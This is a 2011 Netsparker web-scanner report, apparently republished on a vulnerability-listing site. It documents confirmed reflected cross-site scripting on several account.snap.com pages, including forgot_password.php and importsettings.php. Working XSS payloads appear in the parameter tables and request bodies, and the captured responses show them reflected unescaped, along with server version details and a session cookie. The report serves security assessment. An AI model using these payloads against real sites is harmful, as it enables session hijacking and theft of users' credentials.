XSS, Cross Site Scripting in account.snap.com/login.php, CWE-79, CAPEC-86, DORK, GHDB REPORT SUMMARY

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Loading

Netsparker - Scan Report Summary
TARGET URL
https://account.snap.com/login.php
SCAN DATE
7/23/2011 4:07:58 PM
REPORT DATE
7/25/2011 7:06:40 AM
SCAN DURATION
00:34:04

Total Requests

Average Speed

req/sec.
20
identified
12
confirmed
0
critical
4
informational

SCAN SETTINGS

Scan Settings
PROFILE
Previous Settings
ENABLED ENGINES
Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled

VULNERABILITIES

Vulnerabilities
Netsparker - Web Application Security Scanner
IMPORTANT
35 %
MEDIUM
15 %
LOW
30 %
INFORMATION
20 %

VULNERABILITY SUMMARY

Vulnerability Summary
URL Parameter Method Vulnerability Confirmed
/ Redirect Response BODY Is Too Large Yes
/add_site.php url POST [Possible] Cross-site Scripting No
url POST [Possible] Cross-site Scripting No
/add_site.php/%22%20stYle=%22x:expre/**/ssion(alert(9)) URI-BASED Raw URI [Possible] Cross-site Scripting No
/forgot_password.php email POST Cross-site Scripting Yes
/importsettings.php email POST Cross-site Scripting Yes
key POST Cross-site Scripting Yes
email POST Cross-site Scripting Yes
key POST Cross-site Scripting Yes
/javascript/ Apache Version Disclosure No
PHP Version Disclosure No
OpenSSL Version Disclosure No
Apache Module Version Disclosure No
Forbidden Resource Yes
/login.php Cookie Not Marked As Secure Yes
Auto Complete Enabled Yes
Cookie Not Marked As HttpOnly Yes
/signup.php File Upload Functionality Identified Yes
E-mail Address Disclosure No
/signup.php/%22%20stYle=%22x:expre/**/ssion(alert(9)) URI-BASED Raw URI Cross-site Scripting Yes
Cross-site Scripting

Cross-site Scripting

6 TOTAL
IMPORTANT
CONFIRMED
6
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /signup.php/%22%20stYle=%22x:expre/**/ssion(alert(9))

/signup.php/%22%20stYle=%22x:expre/**/ssion(alert(9)) CONFIRMED

https://account.snap.com/signup.php/%22%20stYle=%22x:expre/**/ssion(alert(9))

Parameters

Parameter Type Value
URI-BASED Raw URI /" stYle="x:expre/**/ssion(alert(9))

Request

GET /signup.php/%22%20stYle=%22x:expre/**/ssion(netsparker(9)) HTTP/1.1
Referer: https://account.snap.com/login.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: account.snap.com
Cookie: PHPSESSID=5785bfecc05e8df1ec358b638a7b4947
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Sat, 23 Jul 2011 21:10:48 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.8
X-Powered-By: PHP/5.2.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="content-type" content="text/html; charset=utf-8" /><title>Snap Account Signup</title><link rel="stylesheet" type="text/css" href="styles/account.css" /><script type="text/javascript" src="javascript/tab.js"></script><script type='text/javascript'>function toggle_section(num) { si = document.getElementById('section_'+num+'_img'); sd = document.getElementById('section_'+num+'_div'); sm = document.getElementById('section_'+num+'_more'); if (si.src.indexOf('/images/icon-more.gif') >= 0) { sd.style.display = 'inline'; sm.style.display = 'none'; si.src = '/images/icon-less.gif'; } else { sd.style.display = 'none'; sm.style.display = 'inline'; si.src = '/images/icon-more.gif'; }}</script></head><body><div id="shell">
<div id="topbar">
<div id="logo">
<a href="/"><img src="/images/topbar-logo.gif" alt="Snap Shots" title="Snap Shots" /></a>
</div>
<div id="toplinks">
Not logged in | <a href="/login.php">Log In</a> | <a href="http://snap.com/snapshots_faq.php">Help</a> </div>
</div>
<script>var currentTab = 'customize';</script><div id="tip1" class="tooltip">With this option enabled, a small icon will be added at <br />the end of your active links, signaling to your users <br />which of your links have Snap Shots and which do not.</div> <div id="tip2" class="tooltip">With this option enabled, the trigger hot-zone for the Snap Shots <br />will be limited to the link icon only, which in turn will decrease <br />the chances of your users accidentally triggering Snap Shots.</div><div id="tip3" class="tooltip">With this option enabled, Snap Shots will be enabled for links <br />pointing to pages on your own site. Not recommended for sites <br />where all pages look the same, unless they have RSS.</div><div id="tip4" class="tooltip">With this option enabled, all Shots on your site will be displayed <br />as the default thumbnail screen-capture. Selecting this option <br />severely limits the level of interactivity of Snap Shots.</div><div id="tip5" class="tooltip">With this option enabled, Snap Shots will be enabled for links <br />pointing to pages on other sites.</div><script type="text/javascript">/* Prototype JavaScript framework, version 1.4.0 * (c) 2005 Sam Stephenson <sam@conio.net> * * Prototype is freely distributable under the terms of an MIT-style license. * For details, see the Prototype web site: http://prototype.conio.net/ */*--------------------------------------------------------------------------*/var Prototype = { Version: '1.4.0', ScriptFragment: '(?:<script.*?>)((\n|\r|.)*?)(?:<\/script>)', emptyFunction: function() {}, K: function(x) {return x}}var Class = { create: function() { return function() { this.initialize.apply(this, arguments); } }}var Abstract = new Object();Object.extend = function (destination, source) { for (property in source) { destination[property] = source[property]; } return destination;}Object.inspect = function(object) { try { if (object == undefined) return 'undefined'; if (object == null) return 'null'; return object.inspect ? object.inspect() : object.toString(); } catch (e) { if (e instanceof RangeError) return '...'; throw e; }}/*** XXX: the default prototype bind leaks memory like a sieve *** XXX: see prototype_extensions.js for the safe version */Function.prototype.bind = function() { var __method = this, args = $A(arguments), object = args.shift(); return function() { return __method.apply(object, args.concat($A(arguments))); }}/***/Function.prototype.bindAsEventListener = function(object) { var __method = this; return function(event) { return __method.call(object, event || window.event); }}Object.extend(Number.prototype, { toColorPart: function() { var digits = this.toString(16); if (this < 16) return '0' + digits; return digits; }, succ: function() { return this + 1; }, times: function(iterator) { $R(0, this, true).each(iterator); return this; }});var Try = { these: function() { var returnValue; for (var i = 0; i < arguments.length; i++) { var lambda = arguments[i]; try { returnValue = lambda(); break; } catch (e) {} } return returnValue; }}/*** SnapShot ***/SnapShot = Class.create();Object.extend(SnapShot.prototype, { initialize: function () { this.time = new Array(); }, store: function () { var index = this.time.length; this.time[index] = new Date();// this.time[index].start_time = new Date(); }, reset: function () { this.time = new Array(); }, // the elapsed time of the watch. if the watch hasn't been stopped, get the time that has elapsed so far peek: function () { }, alert: function () { window.alert(this.peek()); }});MultiSnapShot = Class.create();Object.extend(MultiSnapShot.prototype, { initialize: function() { this.watches = {}; }, store: function(w) { if (! this.watches[w]) this.watches[w] = new SnapShot(); this.watches[w].store(); }, reset_all: function() { this.watches = {}; }, output: function() { str = ''; for (var w in this.watches) { if (typeof w != 'function') { for (var i = 0; i < this.watches[w].time.length; i++) { str += '&'+w+'_'+i+'='+this.watches[w].time[i].getTime(); } } } return str; }});/*--------------------------------------------------------------------------*/var PeriodicalExecuter = Class.create();PeriodicalExecuter.prototype = { initialize: function(callback, frequency) { this.callback = callback; this.frequency = frequency; this.currentlyExecuting = false; this.registerCallback(); }, registerCallback: function() { setInterval(this.onTimerEvent.bind(this), this.frequency * 1000); }, onTimerEvent: function() { if (!this.currentlyExecuting) { try { this.currentlyExecuting = true; this.callback(); } finally { this.currentlyExecuting = false; } } }}/*--------------------------------------------------------------------------*/function $() { var elements = new Array(); for (var i = 0; i < arguments.length; i++) { var element = arguments[i]; if (typeof element == 'string') element = document.getElementById(element); if (arguments.length == 1) return element; elements.push(element); } return elements;}Object.extend(String.prototype, { stripTags: function() { return this.replace(/<\/?[^>]+>/gi, ''); }, stripScripts: function() { return this.replace(new RegExp(Prototype.ScriptFragment, 'img'), ''); }, extractScripts: function() { var matchAll = new RegExp(Prototype.ScriptFragment, 'img'); var matchOne = new RegExp(Prototype.ScriptFragment, 'im'); return (this.match(matchAll) || []).map(function(scriptTag) { return (scriptTag.match(matchOne) || ['', ''])[1]; }); }, evalScripts: function() { return this.extractScripts().map(eval); },/* escapeHTML: function() { var div = document.createElement('div'); var text = document.createTextNode(this); div.appendChild(text); return div.innerHTML; }, *//* unescapeHTML: function() { var div = document.createElement('div'); div.innerHTML = this.stripTags(); return div.childNodes[0] ? div.childNodes[0].nodeValue : ''; }, */ toQueryParams: function() { var pairs = this.match(/^\??(.*)$/)[1].split('&'); return pairs.inject({}, function(params, pairString) { var pair = pairString.split('='); params[pair[0]] = pair[1]; return params; }); }, toArray: function() { return this.split(''); }, camelize: function() { var oStringList = this.split('-'); if (oStringList.length == 1) return oStringList[0]; var camelizedString = this.indexOf('-') == 0 ? oStringList[0].charAt(0).toUpperCase() + oStringList[0].substring(1) : oStringList[0]; for (var i = 1, len = oStringList.length; i < len; i++) { var s = oStringList[i]; camelizedString += s.charAt(0).toUpperCase() + s.substring(1); } return camelizedString; }, inspect: function() { return "'" + this.replace('\\', '\\\\').replace("'", '\\\'') + "'"; }});String.prototype.parseQuery = String.prototype.toQueryParams;var $break = new Object();var $continue = new Object();var Enumerable = { each: function(iterator) { var index = 0; try { this._each(function(value) { try { iterator(value, index++); } catch (e) { if (e != $continue) throw e; } }); } catch (e) { if (e != $break) throw e; } }, all: function(iterator) { var result = true; this.each(function(value, index) { result = result && !!(iterator || Prototype.K)(value, index); if (!result) throw $break; }); return result; }, any: function(iterator) { var result = true; this.each(function(value, index) { if (result = !!(iterator || Prototype.K)(value, index)) throw $break; }); return result; }, collect: function(iterator) { var results = []; this.each(function(value, index) { results.push(iterator(value, index)); }); return results; }, detect: function (iterator) { var result; this.each(function(value, index) { if (iterator(value, index)) { result = value; throw $break; } }); return result; }, findAll: function(iterator) { var results = []; this.each(function(value, index) { if (iterator(value, index)) results.push(value); }); return results; },/* grep: function(pattern, iterator) { var results = []; this.each(function(value, index) { var stringValue = value.toString(); if (stringValue.match(pattern)) results.push((iterator || Prototype.K)(value, index)); }) return results; }, */ include: function(object) { var found = false; this.each(function(value) { if (value == object) { found = true; throw $break; } }); return found; }, inject: function(memo, iterator) { this.each(function(value, index) { memo = iterator(memo, value, index); }); return memo; },/* invoke: function(method) { var args = $A(arguments).slice(1); return this.collect(function(value) { return value[method].apply(value, args); }); }, */ max: function(iterator) { var result; this.each(function(value, index) { value = (iterator || Prototype.K)(value, index); if (value >= (result || value)) result = value; }); return result; }, min: function(iterator) { var result; this.each(function(value, index) { value = (iterator || Prototype.K)(value, index); if (value <= (result || value)) result = value; }); return result; }, partition: function(iterator) { var trues = [], falses = []; this.each(function(value, index) { ((iterator || Prototype.K)(value, index) ? trues : falses).push(value); }); return [trues, falses]; }, pluck: function(property) { var results = []; this.each(function(value, index) { results.push(value[property]); }); return results; }, reject: function(iterator) { var results = []; this.each(function(value, index) { if (!iterator(value, index)) results.push(value); }); return results; },/* sortBy: function(iterator) { return this.collect(function(value, index) { return {value: value, criteria: iterator(value, index)}; }).sort(function(left, right) { var a = left.criteria, b = right.criteria; return a < b ? -1 : a > b ? 1 : 0; }).pluck('value'); }, */ toArray: function() { return this.collect(Prototype.K); }, zip: function() { var iterator = Prototype.K, args = $A(arguments); if (typeof args.last() == 'function') iterator = args.pop(); var collections = [this].concat(args).map($A); return this.map(function(value, index) { iterator(value = collections.pluck(index)); return value; }); }, inspect: function() { return '#<Enumerable:' + this.toArray().inspect() + '>'; }}Object.extend(Enumerable, { map: Enumerable.collect, find: Enumerable.detect, select: Enumerable.findAll, member: Enumerable.include, entries: Enumerable.toArray});var $A = Array.from = function(iterable) { if (!iterable) return []; if (iterable.toArray) { return iterable.toArray(); } else { var results = []; for (var i = 0; i < iterable.length; i++) results.push(iterable[i]); return results; }}Object.extend(Array.prototype, Enumerable);Array.prototype._reverse = Array.prototype.reverse;Object.extend(Array.prototype, { _each: function(iterator) { for (var i = 0; i < this.length; i++) iterator(this[i]); }, clear: function() { this.length = 0; return this; }, first: function() { return this[0]; }, last: function() { return this[this.length - 1]; }, compact: function() { return this.select(function(value) { return value != undefined || value != null; }); }, flatten: function() { return this.inject([], function(array, value) { return array.concat(value.constructor == Array ? value.flatten() : [value]); }); }, without: function() { var values = $A(arguments); return this.select(function(value) { return !values.include(value); }); }, indexOf: function(object) { for (var i = 0; i < this.length; i++) if (this[i] == object) return i; return -1; }, reverse: function(inline) { return (inline !== false ? this : this.toArray())._reverse(); }, shift: function() { var result = this[0]; for (var i = 0; i < this.length - 1; i++) this[i] = this[i + 1]; this.length--; return result; }, inspect: function() { return '[' + this.map(Object.inspect).join(', ') + ']'; }});var Hash = { _each: function(iterator) { for (key in this) { var value = this[key]; if (typeof value == 'function') continue; var pair = [key, value]; pair.key = key; pair.value = value; iterator(pair); } }, keys: function() { return this.pluck('key'); }, values: function() { return this.pluck('value'); }, merge: function(hash) { return $H(hash).inject($H(this), function(mergedHash, pair) { mergedHash[pair.key] = pair.value; return mergedHash; }); },/* toQueryString: function() { return this.map(function(pair) { return pair.map(encodeURIComponent).join('='); }).join('&'); }, */ inspect: function() { return '#<Hash:{' + this.map(function(pair) { return pair.map(Object.inspect).join(': '); }).join(', ') + '}>'; }}function $H(object) { var hash = Object.extend({}, object || {}); Object.extend(hash, Enumerable); Object.extend(hash, Hash); return hash;}ObjectRange = Class.create();Object.extend(ObjectRange.prototype, Enumerable);Object.extend(ObjectRange.prototype, { initialize: function(start, end, exclusive) { this.start = start; this.end = end; this.exclusive = exclusive; }, _each: function(iterator) { var value = this.start; do { iterator(value); value = value.succ(); } while (this.include(value)); }, include: function(value) { if (value < this.start) return false; if (this.exclusive) return value < this.end; return value <= this.end; }});var $R = function(start, end, exclusive) { return new ObjectRange(start, end, exclusive);}var Ajax = { getTransport: function() { return Try.these( function() {return new ActiveXObject('Msxml2.XMLHTTP')}, function() {return new ActiveXObject('Microsoft.XMLHTTP')}, function() {return new XMLHttpRequest()} ) || false; }, activeRequestCount: 0}Ajax.Responders = { responders: [], _each: function(iterator) { this.responders._each(iterator); }, register: function(responderToAdd) { if (!this.include(responderToAdd)) this.responders.push(responderToAdd); }, unregister: function(responderToRemove) { this.responders = this.responders.without(responderToRemove); }, dispatch: function(callback, request, transport, json) { this.each(function(responder) { if (responder[callback] && typeof responder[callback] == 'function') { try { responder[callback].apply(responder, [request, transport, json]); } catch (e) {} } }); }};Object.extend(Ajax.Responders, Enumerable);Ajax.Responders.register({ onCreate: function() { Ajax.activeRequestCount++; }, onComplete: function() { Ajax.activeRequestCount--; }});Ajax.Base = function() {};Ajax.Base.prototype = { setOptions: function(options) { this.options = { method: 'post', asynchronous: true, parameters: '' } Object.extend(this.options, options || {}); }, responseIsSuccess: function() { return this.transport.status == undefined || this.transport.status == 0 || (this.transport.status >= 200 && this.transport.status < 300); }, responseIsFailure: function() { return !this.responseIsSuccess(); }}Ajax.Request = Class.create();Ajax.Request.Events = ['Uninitialized', 'Loading', 'Loaded', 'Interactive', 'Complete'];Ajax.Request.prototype = Object.extend(new Ajax.Base(), { initialize: function(url, options) { this.transport = Ajax.getTransport(); this.setOptions(options); this.request(url); }, request: function(url) { var parameters = this.options.parameters || ''; // XXX: commented out by Barry because he has no concept of how this could be relevant (03/02/2006) // if (parameters.length > 0) parameters += '&_='; try { this.url = url; if (this.options.method == 'get' && parameters.length > 0) this.url += (this.url.match(/\?/) ? '&' : '?') + parameters; Ajax.Responders.dispatch('onCreate', this, this.transport); this.transport.open(this.options.method, this.url, this.options.asynchronous); if (this.options.asynchronous) { this.transport.onreadystatechange = this.onStateChange.bind(this); setTimeout((function() {this.respondToReadyState(1)}).bind(this), 10); } this.setRequestHeaders(); var body = this.options.postBody ? this.options.postBody : parameters; this.transport.send(this.options.method == 'post' ? body : null); } catch (e) { this.dispatchException(e); } }, setRequestHeaders: function() { var requestHeaders = ['X-Requested-With', 'XMLHttpRequest', 'X-Prototype-Version', Prototype.Version]; if (this.options.method == 'post') { requestHeaders.push('Content-type', 'application/x-www-form-urlencoded'); /* Force "Connection: close" for Mozi..
- /forgot_password.php

/forgot_password.php CONFIRMED

https://account.snap.com/forgot_password.php

Parameters

Parameter Type Value
email POST '"--></style></script><script>alert(0x000232)</script>

Request

POST /forgot_password.php HTTP/1.1
Referer: https://account.snap.com/forgot_password.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: account.snap.com
Cookie: PHPSESSID=5785bfecc05e8df1ec358b638a7b4947
Content-Length: 91
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

email='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000232)%3c%2fscript%3e

Response

HTTP/1.0 200 OK
Date: Sat, 23 Jul 2011 22:29:40 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.8
X-Powered-By: PHP/5.2.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Length: 3022
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="content-type" content="text/html; charset=utf-8" /><title>Snap Account Forgot Password</title><link rel="stylesheet" type="text/css" href="styles/account.css" /><script type="text/javascript" src="javascript/tab.js"></script></head><body><div id="shell">
<div id="topbar">
<div id="logo">
<a href="/"><img src="/images/topbar-logo.gif" alt="Snap Shots" title="Snap Shots" /></a>
</div>
<div id="toplinks">
Not logged in | <a href="/login.php">Log In</a> | <a href="http://snap.com/snapshots_faq.php">Help</a> </div>
</div>
<div id="top-cap"></div><div id="wrapper"><div id="leftSide"><h1>Forgot Your Password</h1><div id="colCombine"> <form id="forgot_password" name="forgot_password" action="/forgot_password.php" method="post"><p class="alert">The email address was invalid. Please try again.</p><p>If you can't remember your email, you can <a href="/signup.php">sign-up for a new Snap Shots account</a>.</p> <div id="enterInfo" style="margin:0 15px"> <div> <h2>Please Enter Your Email</h2> </div> <div> <h5>Your Email:</h5> <input type="text" class="text" name="email" value="'"--></style></script><script>netsparker(0x000232)</script>"> </div> <div class="btn"> <img onclick="javascript:document.forgot_password.submit();" src="/images/btn-sendPW.gif" width="240" height="31" alt="Send Password" title="Send Password" /> </div> <div class="dotted"> <p> <h5>Already have Snap Shots on your site but no account?</h5> <a href="/importsettings.php">Click here</a> to create an account based on your current settings. </p> </div> </div> </form> </div></div><div id="rightSide"> <div class="sidebar"> <h4>Recent Blog Posts</h4> </div></div><div class="clear"></div></div><div id="bottom-cap"></div><div id="footer">
<div id="logo">
<a href="http://snap.com/"><img src="/images/footer-logo.gif" alt="Snap" title="Snap" /></a>
</div>
<div id="footlinks">
<a href="http://snap.com/about/about.php">About</a> | <a href="http://blog.snap.com/">Blog</a> | <a href="http://snap.com/about/feedbk.php">Feedback</a> | <a href="http://snap.com/about/downloads.php">Download</a> | <a href="http://snap.com/about/privacy.php">Privacy</a> | <a href="http://snap.com/about/terms.php">Terms</a>
</div>
</div>
<script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript"></script><script type="text/javascript">_udn = document.domain;_uacct = "UA-2209883-1";if (typeof currentTab == "string") { urchinTracker("/forgot_password.php#" + currentTab);} else { urchinTracker();}</script><form id="login_form" method="POST" action="login.php"> <input type="hidden" name="tab" value="1"></form></div></body></html>
- /importsettings.php

/importsettings.php CONFIRMED

https://account.snap.com/importsettings.php

Parameters

Parameter Type Value
email POST '"--></style></script><script>alert(0x000244)</script>
key POST 3

Request

POST /importsettings.php HTTP/1.1
Referer: https://account.snap.com/importsettings.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: account.snap.com
Cookie: PHPSESSID=5785bfecc05e8df1ec358b638a7b4947
Content-Length: 97
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

email='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000244)%3c%2fscript%3e&key=3

Response

HTTP/1.0 200 OK
Date: Sat, 23 Jul 2011 22:30:00 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.8
X-Powered-By: PHP/5.2.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Length: 5281
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="content-type" content="text/html; charset=utf-8" /><title>Snap Account Signup</title><link rel="stylesheet" type="text/css" href="styles/account.css" /><script type="text/javascript" src="javascript/tab.js"></script></head><body><div id="shell">
<div id="topbar">
<div id="logo">
<a href="/"><img src="/images/topbar-logo.gif" alt="Snap Shots" title="Snap Shots" /></a>
</div>
<div id="toplinks">
Not logged in | <a href="/login.php">Log In</a> | <a href="http://snap.com/snapshots_faq.php">Help</a> </div>
</div>
<script type="text/javascript" language="javascript">// <! Tooltip Functions function xstooltip_findPosX(obj) { var curleft = 0; if (obj.offsetParent) { while (obj.offsetParent) { curleft += obj.offsetLeft obj = obj.offsetParent; } } else if (obj.x) curleft += obj.x; return curleft;}function xstooltip_findPosY(obj) { var curtop = 0; if (obj.offsetParent) { while (obj.offsetParent) { curtop += obj.offsetTop obj = obj.offsetParent; } } else if (obj.y) curtop += obj.y; return curtop;}function xstooltip_show(tooltipId, parentId, posX, posY){ it = document.getElementById(tooltipId); if ((it.style.top == '' || it.style.top == 0) && (it.style.left == '' || it.style.left == 0)) { // need to fixate default size (MSIE problem) it.style.width = it.offsetWidth + 'px'; it.style.height = it.offsetHeight + 'px'; img = document.getElementById(parentId); // if tooltip is too wide, shift left to be within parent if (posX + it.offsetWidth > img.offsetWidth) posX = img.offsetWidth - it.offsetWidth; if (posX < 0 ) posX = 0; x = xstooltip_findPosX(img) + posX; y = xstooltip_findPosY(img) + posY; it.style.top = y + 'px'; it.style.left = x + 'px'; } it.style.visibility = 'visible'; }function xstooltip_hide(id){ it = document.getElementById(id); it.style.visibility = 'hidden'; }// ]]></script><div id="top-cap"></div><div id="wrapper"><div id="tip1" class="tooltip"> Your Shots Key was created when you signed up for Snap Shots and can be <br /> found inside the Snap Shots JavaScript tag (view source) on any page where <br /> you currently have Snap Shots enabled. <br /><br /> Example of Snap Shots JavaScript tag: <br /> &lt;script type="text/javascript" src="http://shots.snap.com/snap_shots.js?ap=1<br /> &amp;key=<b>29b1ec081f2bf5401db979cf98f6b845</b>&amp;th=silver..."&gt;&lt;/script&gt;</div> <div class="clear"></div><div id="leftSide"><h1>Import Your Old Snap Shots Settings</h1><form action="/importsettings.php" method="post"> <div id="column2"> <input type="hidden" name="email" value="'"--></style></script><script>netsparker(0x000244)</script>"> <input type="hidden" name="key" value="3"> <input type="hidden" name="retry" value="1"> <ul id="Failed"> <li> <h2 class="red0">Validation Failed: Bad Match</h2> </li> <li> We were unable to find a match between the Email and Site URL that you provided. </li> <li> <h5>Email</h5> '"--></style></script><script>netsparker(0x000244)</script> </li> <li> <h5>Site URL</h5> 3 </li> <li> Please make sure that both the Email and the Site URL are correct and feel free to try again. </li> <li> Or, if you would rather just keep going right now, you can choose to start fresh with a new account and a new Snap Shots installation. </li> <li> <div class="l"> <a href="/signup.php"><img src="/images/btn-createNew.gif" width="160" height="31" alt="Create New Account" title="Create New Account" /></a> </div> <div class="r"> <input type="image" class="image" src="/images/btn-tryAgain.gif" width="156" height="31" alt="Try Again" title="Try Again" /> </div> </li> <div class="clear"></div> </ul> </form> </div> <div id="column1"> </div></div><div class="clear"></div></div><div id="bottom-cap"></div><div id="footer">
<div id="logo">
<a href="http://snap.com/"><img src="/images/footer-logo.gif" alt="Snap" title="Snap" /></a>
</div>
<div id="footlinks">
<a href="http://snap.com/about/about.php">About</a> | <a href="http://blog.snap.com/">Blog</a> | <a href="http://snap.com/about/feedbk.php">Feedback</a> | <a href="http://snap.com/about/downloads.php">Download</a> | <a href="http://snap.com/about/privacy.php">Privacy</a> | <a href="http://snap.com/about/terms.php">Terms</a>
</div>
</div>
<script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript"></script><script type="text/javascript">_udn = document.domain;_uacct = "UA-2209883-1";if (typeof currentTab == "string") { urchinTracker("/importsettings.php#" + currentTab);} else { urchinTracker();}</script></div></body></html>
- /importsettings.php

/importsettings.php CONFIRMED

https://account.snap.com/importsettings.php

Parameters

Parameter Type Value
email POST netsparker@example.com
key POST '"--></style></script><script>alert(0x000248)</script>

Request

POST /importsettings.php HTTP/1.1
Referer: https://account.snap.com/importsettings.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: account.snap.com
Cookie: PHPSESSID=5785bfecc05e8df1ec358b638a7b4947
Content-Length: 120
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

email=netsparker%40example.com&key='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000248)%3c%2fscript%3e

Response

HTTP/1.0 200 OK
Date: Sat, 23 Jul 2011 22:30:03 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.8
X-Powered-By: PHP/5.2.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Length: 5323
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="content-type" content="text/html; charset=utf-8" /><title>Snap Account Signup</title><link rel="stylesheet" type="text/css" href="styles/account.css" /><script type="text/javascript" src="javascript/tab.js"></script></head><body><div id="shell">
<div id="topbar">
<div id="logo">
<a href="/"><img src="/images/topbar-logo.gif" alt="Snap Shots" title="Snap Shots" /></a>
</div>
<div id="toplinks">
Not logged in | <a href="/login.php">Log In</a> | <a href="http://snap.com/snapshots_faq.php">Help</a> </div>
</div>
<script type="text/javascript" language="javascript">// <! Tooltip Functions function xstooltip_findPosX(obj) { var curleft = 0; if (obj.offsetParent) { while (obj.offsetParent) { curleft += obj.offsetLeft obj = obj.offsetParent; } } else if (obj.x) curleft += obj.x; return curleft;}function xstooltip_findPosY(obj) { var curtop = 0; if (obj.offsetParent) { while (obj.offsetParent) { curtop += obj.offsetTop obj = obj.offsetParent; } } else if (obj.y) curtop += obj.y; return curtop;}function xstooltip_show(tooltipId, parentId, posX, posY){ it = document.getElementById(tooltipId); if ((it.style.top == '' || it.style.top == 0) && (it.style.left == '' || it.style.left == 0)) { // need to fixate default size (MSIE problem) it.style.width = it.offsetWidth + 'px'; it.style.height = it.offsetHeight + 'px'; img = document.getElementById(parentId); // if tooltip is too wide, shift left to be within parent if (posX + it.offsetWidth > img.offsetWidth) posX = img.offsetWidth - it.offsetWidth; if (posX < 0 ) posX = 0; x = xstooltip_findPosX(img) + posX; y = xstooltip_findPosY(img) + posY; it.style.top = y + 'px'; it.style.left = x + 'px'; } it.style.visibility = 'visible'; }function xstooltip_hide(id){ it = document.getElementById(id); it.style.visibility = 'hidden'; }// ]]></script><div id="top-cap"></div><div id="wrapper"><div id="tip1" class="tooltip"> Your Shots Key was created when you signed up for Snap Shots and can be <br /> found inside the Snap Shots JavaScript tag (view source) on any page where <br /> you currently have Snap Shots enabled. <br /><br /> Example of Snap Shots JavaScript tag: <br /> &lt;script type="text/javascript" src="http://shots.snap.com/snap_shots.js?ap=1<br /> 